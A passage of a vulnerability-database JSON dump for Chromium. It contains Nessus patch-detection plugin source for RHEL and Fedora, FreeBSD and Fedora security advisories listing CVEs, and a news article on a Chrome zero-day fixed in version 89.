prefix:\"chromium-shell\", reference:\"89.0.4389.114-1~deb10u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, 
extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-30T05:36:58", "description": "An update for chromium-browser is now available for Red Hat Enterprise\nLinux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 78.0.3904.87.\n\nSecurity Fix(es) :\n\n* chromium-browser: use-after-free in audio (CVE-2019-13720)\n\n* chromium-browser: use-after-free in PDFium (CVE-2019-13721)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.", "edition": 12, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-11-08T00:00:00", "title": "RHEL 6 : chromium-browser (RHSA-2019:3775)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "modified": "2019-11-08T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo", "p-cpe:/a:redhat:enterprise_linux:chromium-browser", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2019-3775.NASL", "href": "https://www.tenable.com/plugins/nessus/130746", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:3775. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(130746);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/29\");\n\n script_cve_id(\"CVE-2019-13720\", \"CVE-2019-13721\");\n script_xref(name:\"RHSA\", value:\"2019:3775\");\n\n script_name(english:\"RHEL 6 : chromium-browser (RHSA-2019:3775)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"An update for chromium-browser is now available for Red Hat Enterprise\nLinux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 78.0.3904.87.\n\nSecurity Fix(es) :\n\n* chromium-browser: use-after-free in audio (CVE-2019-13720)\n\n* chromium-browser: use-after-free in PDFium (CVE-2019-13721)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2019:3775\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13720\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-13721\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected 
chromium-browser and / or\nchromium-browser-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2019:3775\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-78.0.3904.87-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-78.0.3904.87-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", 
cpu:\"i686\", reference:\"chromium-browser-debuginfo-78.0.3904.87-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-debuginfo-78.0.3904.87-1.el6_10\", allowmaj:TRUE)) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium-browser / chromium-browser-debuginfo\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-30T02:27:21", "description": "Update chromium to 78.0.3904.87. Fixes CVE-2019-13720 and\nCVE-2019-13721\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 11, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-11-12T00:00:00", "title": "Fedora 31 : chromium (2019-688d52f9ff)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "modified": "2019-11-12T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:chromium", "cpe:/o:fedoraproject:fedora:31"], "id": "FEDORA_2019-688D52F9FF.NASL", "href": "https://www.tenable.com/plugins/nessus/130786", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-688d52f9ff.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(130786);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/29\");\n\n script_cve_id(\"CVE-2019-13720\", \"CVE-2019-13721\");\n 
script_xref(name:\"FEDORA\", value:\"2019-688d52f9ff\");\n\n script_name(english:\"Fedora 31 : chromium (2019-688d52f9ff)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Update chromium to 78.0.3904.87. Fixes CVE-2019-13720 and\nCVE-2019-13721\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-688d52f9ff\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected chromium package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:31\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/12\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^31([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 31\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC31\", reference:\"chromium-78.0.3904.87-1.fc31\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2021-03-04T13:26:50", "bulletinFamily": "unix", "cvelist": ["CVE-2021-21168", "CVE-2021-21173", "CVE-2021-21185", "CVE-2021-21165", "CVE-2021-21179", 
"CVE-2021-21171", "CVE-2020-27844", "CVE-2021-21161", "CVE-2021-21178", "CVE-2021-21176", "CVE-2021-21159", "CVE-2021-21187", "CVE-2021-21180", "CVE-2021-21170", "CVE-2021-21162", "CVE-2021-21181", "CVE-2021-21167", "CVE-2021-21172", "CVE-2021-21163", "CVE-2021-21186", "CVE-2021-21166", "CVE-2021-21175", "CVE-2021-21190", "CVE-2021-21160", "CVE-2021-21184", "CVE-2021-21164", "CVE-2021-21188", "CVE-2021-21174", "CVE-2021-21177", "CVE-2021-21189", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21169"], "description": "\nChrome Releases reports:\n\nThis release includes 47 security fixes, including the below.\n\t Google is aware of reports that an exploit for CVE-2021-21166 exists\n\t in the wild.\n\n[1171049] High CVE-2021-21159: Heap buffer overflow in\n\t TabStrip. Reported by Khalil Zhani on 2021-01-27\n[1170531] High CVE-2021-21160: Heap buffer overflow in\n\t WebAudio. Reported by Marcin 'Icewall' Noga of Cisco Talos on\n\t 2021-01-25\n[1173702] High CVE-2021-21161: Heap buffer overflow in\n\t TabStrip. Reported by Khalil Zhani on 2021-02-02\n[1172054] High CVE-2021-21162: Use after free in WebRTC.\n\t Reported by Anonymous on 2021-01-29\n[1111239] High CVE-2021-21163: Insufficient data validation in\n\t Reader Mode. Reported by Alison Huffman, Microsoft Browser\n\t Vulnerability Research on 2020-07-30\n[1164846] High CVE-2021-21164: Insufficient data validation in\n\t Chrome for iOS. 
Reported by Muneaki Nishimura (nishimunea) on\n\t 2021-01-11\n[1174582] High CVE-2021-21165: Object lifecycle issue in audio.\n\t Reported by Alison Huffman, Microsoft Browser Vulnerability\n\t Research on 2021-02-04\n[1177465] High CVE-2021-21166: Object lifecycle issue in audio.\n\t Reported by Alison Huffman, Microsoft Browser Vulnerability\n\t Research on 2021-02-11\n[1161144] Medium CVE-2021-21167: Use after free in bookmarks.\n\t Reported by Leecraso and Guang Gong of 360 Alpha Lab on\n\t 2020-12-22\n[1152226] Medium CVE-2021-21168: Insufficient policy\n\t enforcement in appcache. Reported by Luan Herrera (@lbherrera_)\n\t on 2020-11-24\n[1166138] Medium CVE-2021-21169: Out of bounds memory access in\n\t V8. Reported by Bohan Liu (@P4nda20371774) and Moon Liang of\n\t Tencent Security Xuanwu Lab on 2021-01-13\n[1111646] Medium CVE-2021-21170: Incorrect security UI in\n\t Loader. Reported by David Erceg on 2020-07-31\n[1152894] Medium CVE-2021-21171: Incorrect security UI in\n\t TabStrip and Navigation. Reported by Irvan Kurniawan (sourc7) on\n\t 2020-11-25\n[1150810] Medium CVE-2021-21172: Insufficient policy\n\t enforcement in File System API. Reported by Maciej Pulikowski on\n\t 2020-11-19\n[1154250] Medium CVE-2021-21173: Side-channel information\n\t leakage in Network Internals. Reported by Tom Van Goethem from\n\t imec-DistriNet, KU Leuven on 2020-12-01\n[1158010] Medium CVE-2021-21174: Inappropriate implementation\n\t in Referrer. Reported by Ashish Gautam Kamble on 2020-12-11\n[1146651] Medium CVE-2021-21175: Inappropriate implementation\n\t in Site isolation. Reported by Jun Kokatsu, Microsoft Browser\n\t Vulnerability Research on 2020-11-07\n[1170584] Medium CVE-2021-21176: Inappropriate implementation\n\t in full screen mode. Reported by Luan Herrera (@lbherrera_) on\n\t 2021-01-26\n[1173879] Medium CVE-2021-21177: Insufficient policy\n\t enforcement in Autofill. 
Reported by Abdulrahman Alqabandi,\n\t Microsoft Browser Vulnerability Research on 2021-02-03\n[1174186] Medium CVE-2021-21178: Inappropriate implementation\n\t in Compositing. Reported by Japong on 2021-02-03\n[1174943] Medium CVE-2021-21179: Use after free in Network\n\t Internals. Reported by Anonymous on 2021-02-05\n[1175507] Medium CVE-2021-21180: Use after free in tab search.\n\t Reported by Abdulrahman Alqabandi, Microsoft Browser\n\t Vulnerability Research on 2021-02-07\n[1177875] Medium CVE-2020-27844: Heap buffer overflow in\n\t OpenJPEG. Reported by Sean Campbell at Tableau on 2021-02-12\n[1182767] Medium CVE-2021-21181: Side-channel information\n\t leakage in autofill. Reported by Xu Lin (University of Illinois\n\t at Chicago), Panagiotis Ilia (University of Illinois at Chicago),\n\t Jason Polakis (University of Illinois at Chicago) on\n\t 2021-02-26\n[1049265] Low CVE-2021-21182: Insufficient policy enforcement\n\t in navigations. Reported by Luan Herrera (@lbherrera_) on\n\t 2020-02-05\n[1105875] Low CVE-2021-21183: Inappropriate implementation in\n\t performance APIs. Reported by Takashi Yoneuchi (@y0n3uchy) on\n\t 2020-07-15\n[1131929] Low CVE-2021-21184: Inappropriate implementation in\n\t performance APIs. Reported by James Hartig on 2020-09-24\n[1100748] Low CVE-2021-21185: Insufficient policy enforcement\n\t in extensions. Reported by David Erceg on 2020-06-30\n[1153445] Low CVE-2021-21186: Insufficient policy enforcement\n\t in QR scanning. Reported by dhirajkumarnifty on 2020-11-28\n[1155516] Low CVE-2021-21187: Insufficient data validation in\n\t URL formatting. Reported by Kirtikumar Anandrao Ramchandani on\n\t 2020-12-04\n[1161739] Low CVE-2021-21188: Use after free in Blink. Reported\n\t by Woojin Oh(@pwn_expoit) of STEALIEN on 2020-12-24\n[1165392] Low CVE-2021-21189: Insufficient policy enforcement\n\t in payments. 
Reported by Khalil Zhani on 2021-01-11\n[1166091] Low CVE-2021-21190: Uninitialized Use in PDFium.\n\t Reported by Zhou Aiting(@zhouat1) of Qihoo 360 Vulcan Team on\n\t 2021-01-13\n\n\n", "edition": 1, "modified": "2021-03-02T00:00:00", "published": "2021-03-02T00:00:00", "id": "F00B65D8-7CCB-11EB-B3BE-E09467587C17", "href": "https://vuxml.freebsd.org/freebsd/f00b65d8-7ccb-11eb-b3be-e09467587c17.html", "title": "chromium -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}], "fedora": [{"lastseen": "2021-04-05T22:43:31", "bulletinFamily": "unix", "cvelist": ["CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190"], "description": "Chromium is an open-source web browser, powered by WebKit (Blink). 
", "modified": "2021-04-05T00:18:43", "published": "2021-04-05T00:18:43", "id": "FEDORA:BF4FC30A0346", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 34 Update: chromium-89.0.4389.90-3.fc34", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-01T22:40:28", "bulletinFamily": "unix", "cvelist": ["CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190"], "description": "Chromium is an open-source web browser, powered by WebKit (Blink). 
", "modified": "2021-04-01T01:51:39", "published": "2021-04-01T01:51:39", "id": "FEDORA:C67773052A4D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: chromium-89.0.4389.90-3.fc33", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-21T00:08:29", "bulletinFamily": "unix", "cvelist": ["CVE-2021-21149", "CVE-2021-21150", "CVE-2021-21151", "CVE-2021-21152", "CVE-2021-21153", "CVE-2021-21154", "CVE-2021-21155", "CVE-2021-21156", "CVE-2021-21157", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190"], "description": "Chromium is an open-source web browser, powered by WebKit (Blink). ", "modified": "2021-03-20T01:15:37", "published": "2021-03-20T01:15:37", "id": "FEDORA:A017F3074280", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: chromium-89.0.4389.82-1.fc32", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "description": "Chromium is an open-source web browser, powered by WebKit (Blink). 
", "modified": "2019-11-09T21:22:25", "published": "2019-11-09T21:22:25", "id": "FEDORA:3608E6051CC4", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 31 Update: chromium-78.0.3904.87-1.fc31", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-13659", "CVE-2019-13660", "CVE-2019-13661", "CVE-2019-13662", "CVE-2019-13663", "CVE-2019-13664", "CVE-2019-13665", "CVE-2019-13666", "CVE-2019-13667", "CVE-2019-13668", "CVE-2019-13669", "CVE-2019-13670", "CVE-2019-13671", "CVE-2019-13673", "CVE-2019-13674", "CVE-2019-13675", "CVE-2019-13676", "CVE-2019-13677", "CVE-2019-13678", "CVE-2019-13679", "CVE-2019-13680", "CVE-2019-13681", "CVE-2019-13682", "CVE-2019-13683", "CVE-2019-13691", "CVE-2019-13692", "CVE-2019-13720", "CVE-2019-13721", "CVE-2019-5870", "CVE-2019-5871", "CVE-2019-5872", "CVE-2019-5874", "CVE-2019-5875", "CVE-2019-5876", "CVE-2019-5877", "CVE-2019-5878", "CVE-2019-5879", "CVE-2019-5880", "CVE-2019-5881"], "description": "Chromium is an open-source web browser, powered by WebKit (Blink). 
", "modified": "2019-11-15T03:55:58", "published": "2019-11-15T03:55:58", "id": "FEDORA:2B88A6092506", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 30 Update: chromium-78.0.3904.87-1.fc30", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-13659", "CVE-2019-13660", "CVE-2019-13661", "CVE-2019-13662", "CVE-2019-13663", "CVE-2019-13664", "CVE-2019-13665", "CVE-2019-13666", "CVE-2019-13667", "CVE-2019-13668", "CVE-2019-13669", "CVE-2019-13670", "CVE-2019-13671", "CVE-2019-13673", "CVE-2019-13674", "CVE-2019-13675", "CVE-2019-13676", "CVE-2019-13677", "CVE-2019-13678", "CVE-2019-13679", "CVE-2019-13680", "CVE-2019-13681", "CVE-2019-13682", "CVE-2019-13683", "CVE-2019-13691", "CVE-2019-13692", "CVE-2019-13720", "CVE-2019-13721", "CVE-2019-5870", "CVE-2019-5871", "CVE-2019-5872", "CVE-2019-5874", "CVE-2019-5875", "CVE-2019-5876", "CVE-2019-5877", "CVE-2019-5878", "CVE-2019-5879", "CVE-2019-5880", "CVE-2019-5881"], "description": "Chromium is an open-source web browser, powered by WebKit (Blink). 
", "modified": "2019-11-15T03:20:57", "published": "2019-11-15T03:20:57", "id": "FEDORA:AC09F608BFF0", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: chromium-78.0.3904.87-1.fc29", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2021-03-13T04:28:52", "bulletinFamily": "info", "cvelist": ["CVE-2021-21148", "CVE-2021-21166"], "description": "[](<https://thehackernews.com/images/-QHv1N-h4fZY/YD8letBQzWI/AAAAAAAAB64/E1KslMnXt0oEcr7e27y2idTnPPl_nm3VQCLcBGAsYHQ/s0/chrome-hacking.jpg>)\n\nExactly a month after [patching](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) an actively exploited zero-day flaw in Chrome, Google today rolled out fixes for yet another zero-day vulnerability in the world's most popular web browser that it says is being abused in the wild.\n\nChrome 89.0.4389.72, released by the search giant for Windows, Mac, and Linux on Tuesday, comes with a total of 47 security fixes, the most severe of which concerns an \"object lifecycle issue in audio.\"\n\nTracked as CVE-2021-21166, the security flaw is one of the two bugs reported last month by Alison Huffman of Microsoft Browser Vulnerability Research on February 11. 
A separate object lifecycle flaw, also identified in the audio component, was reported to Google on February 4, the same day the stable version of Chrome 88 became available.\n\nWith no additional details, it's not immediately clear if the two security shortcomings are related.\n\n[](<https://thehackernews.com/images/--VPerofAuok/YD8mK08wMrI/AAAAAAAAB7I/VkM_Pg08vFQEvCxV3HbTbaDEd1HRja87QCLcBGAsYHQ/s0/hacking.jpg>)\n\nGoogle acknowledged that an exploit for the vulnerability exists in the wild but stopped short of sharing more specifics to allow a majority of users to install the fixes and prevent other threat actors from creating exploits targeting this zero-day.\n\n\"Google is aware of reports that an exploit for CVE-2021-21166 exists in the wild,\" Chrome Technical Program Manager Prudhvikumar Bommana [said](<https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop.html>).\n\nThis is the second zero-day flaw in Chrome that Google has addressed since the start of the year.\n\nOn February 4, the company [issued a fix](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) for an actively-exploited heap buffer overflow flaw (CVE-2021-21148) in its V8 JavaScript rendering engine. Additionally, Google last year [resolved five Chrome zero-days](<https://thehackernews.com/2020/11/two-new-chrome-0-days-under-active.html>) that were actively exploited in the wild in a span of one month between October 20 and November 12.\n\nChrome users can update to the latest version by heading to Settings > Help > About Google Chrome to mitigate the risk associated with the flaw.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2021-03-13T02:55:42", "published": "2021-03-03T06:03:00", "id": "THN:EF50BA60FF5E3EF9AF1570FF5A2589A0", "href": "https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html", "type": "thn", "title": "New Chrome 0-day Bug Under Active Attacks \u2013 Update Your Browser ASAP!", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-16T05:26:08", "bulletinFamily": "info", "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193"], "description": "[](<https://thehackernews.com/images/-tnjJ0FH8P0I/YEwt7ddHBcI/AAAAAAAACB8/2lR87aM5jBAUOKikDOdI3SWSC9ZG92FcgCLcBGAsYHQ/s0/chrome-browser-update.jpg>)\n\nGoogle has addressed yet another actively exploited zero-day in Chrome browser, marking the second such fix released by the company within a month.\n\nThe browser maker on 